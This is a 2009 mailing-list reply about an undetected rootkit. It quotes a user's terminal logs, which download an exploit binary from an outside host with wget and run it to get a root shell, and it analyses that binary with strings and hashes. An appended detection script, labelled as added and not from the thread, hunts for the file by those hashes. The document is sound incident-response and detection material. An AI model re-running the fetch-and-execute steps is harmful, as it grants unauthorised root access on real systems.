
Re: rootkit not found by rkhunter



On Sun, 4 Oct 2009 10:15:35 -0400
Thomas Krichel <krichel@openlib.org> wrote:

>   I am running debian testing, 2.6.30 kernel.
> 
>   I have a rootkit installed on a bunch of machines that rkhunter
>   does not find. This appears after infection with SHV4 / SHV5,
>   which rkhunter found.
> 
>   Here it works to allow a non-root user to become root
> 
> krichel@fricka:~$ mkdir a
> krichel@fricka:~$ cd a
> krichel@fricka:~/a$ ls -l
> total 0
> krichel@fricka:~/a$  wget webmail.facill.com.br/a
> --2009-10-04 07:47:42--  http://webmail.facill.com.br/a
> Resolving webmail.facill.com.br... 201.65.241.194
> Connecting to webmail.facill.com.br|201.65.241.194|:80... connected.
> HTTP request sent, awaiting response... 200 OK
> Length: 6886 (6.7K) [text/plain]
> Saving to: `a'
> 
> 100%[======================================>] 6,886       6.88K/s
> in 1.0s    
> 
> 2009-10-04 07:47:44 (6.88 KB/s) - `a' saved [6886/6886]
> 
> krichel@fricka:~/a$ chmod 777 a
> krichel@fricka:~/a$ ./a
> root@fricka:~/a# 
> 
>   Here is a situation where it does not work 
> 
> krichel@chichek:~$ mkdir a
> krichel@chichek:~$ cd a
> krichel@chichek:~/a$ wget webmail.facill.com.br/a
> --2009-10-04 07:31:15--  http://webmail.facill.com.br/a
> Resolving webmail.facill.com.br... 201.65.241.194
> Connecting to webmail.facill.com.br|201.65.241.194|:80... connected.
> HTTP request sent, awaiting response... 200 OK
> Length: 6886 (6.7K) [text/plain]
> Saving to: `a'
> 
> 100%[======================================>] 6,886       37.8K/s
> in 0.2s    
> 
> 2009-10-04 07:31:16 (37.8 KB/s) - `a' saved [6886/6886]
> 
> krichel@chichek:~/a$ chmod 777 a
> krichel@chichek:~/a$ ./a
> mmap: Permission denied
> 
> 
>   Does anybody here know how to delete this kit?
> 
> 
>   Cheers,
> 
>   Thomas Krichel                    http://openlib.org/home/krichel
>                                 RePEc:per:1965-06-05:thomas_krichel
>                                                skype: thomaskrichel

This file should at least be deleted from the host.

fgeek@foo:~$ file a
a: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV),
dynamically linked (uses shared libs), for GNU/Linux 2.6.9, not
stripped
fgeek@foo:~$ strings a
/lib/ld-linux.so.2
__gmon_start__
libc.so.6
_IO_stdin_used
socket
exit
execl
ftruncate
perror
sendfile
unlink
mkstemp
mmap
getpagesize
getgid
getuid
__libc_start_main
GLIBC_2.1
GLIBC_2.0
PTRh
([^_]
[^_]
mmap
socket
mkstemp
unlink
ftruncate
/bin/sh
/tmp/tmp.XXXXXX
fgeek@foo:~$ md5sum a
b950af01be61a8cbf5d479430738bd18  a
fgeek@foo:~$ sha1sum a
639536caea56554406106ad8679115971485f3a2  a
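An added example, not part of fgeek's reply or of any post in this thread: a POSIX sh script an admin could run on the other machines Thomas mentions to hunt for this same file. It uses the md5sum/sha1sum values posted above as the primary indicator, and a weaker heuristic built from the strings output (a 32-bit ELF that carries mmap, socket, sendfile, mkstemp, ftruncate, unlink, execl and /bin/sh) to catch a recompiled copy with a different hash. The function names, the IOC_* variable names and any directory argument are mine, not from the thread; the hashes are the ones from the reply.

```shell
#!/bin/sh
# Added example (not code from this thread): locate copies of the binary
# that fgeek hashed above. Hashes are the ones posted in the reply; every
# other name here is an assumption of this example.

# Known-bad hashes from the reply (space-separated so more can be appended).
IOC_MD5="b950af01be61a8cbf5d479430738bd18"
IOC_SHA1="639536caea56554406106ad8679115971485f3a2"

# hash_matches FILE: exit 0 if FILE's sha1 or md5 is in the IOC lists.
hash_matches() {
    f="$1"
    [ -f "$f" ] || return 1
    s=$(sha1sum "$f" | cut -d' ' -f1)
    m=$(md5sum "$f" | cut -d' ' -f1)
    for h in $IOC_SHA1; do [ "$s" = "$h" ] && return 0; done
    for h in $IOC_MD5;  do [ "$m" = "$h" ] && return 0; done
    return 1
}

# looks_like_sample FILE: weaker heuristic for a recompiled variant.
# Requires the ELF magic with EI_CLASS=1 (32-bit) and every symbol/string
# that the strings output above shows. Uses tr instead of strings(1) so it
# works where binutils is not installed.
looks_like_sample() {
    f="$1"
    [ -f "$f" ] || return 1
    magic=$(dd if="$f" bs=1 count=5 2>/dev/null | od -An -tx1 | tr -d ' \n')
    [ "$magic" = "7f454c4601" ] || return 1
    syms=$(tr -c '[:print:]' '\n' < "$f")
    for needle in mmap socket sendfile mkstemp ftruncate unlink execl /bin/sh; do
        printf '%s\n' "$syms" | grep -qx -- "$needle" || return 1
    done
    return 0
}

# scan_tree DIR: print "HASH path" or "HEUR path" for each regular file under
# DIR that matches; exit 0 if anything was found, 1 otherwise.
scan_tree() {
    out=$(find "$1" -xdev -type f -print 2>/dev/null | while IFS= read -r f; do
        if hash_matches "$f"; then printf 'HASH %s\n' "$f"
        elif looks_like_sample "$f"; then printf 'HEUR %s\n' "$f"
        fi
    done)
    if [ -n "$out" ]; then printf '%s\n' "$out"; return 0; fi
    return 1
}

# Usage (constructed): scan the places a dropped binary usually lands.
# scan_tree /tmp; scan_tree /var/tmp; scan_tree /home
```

A HASH hit is the exact file from the thread and is conclusive; a HEUR hit only says the file imports the same set of libc calls, so look at it with file(1) and strings(1) before acting on it. Deleting the file is the minimum; a host where it ran as root should be treated as fully compromised and rebuilt.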

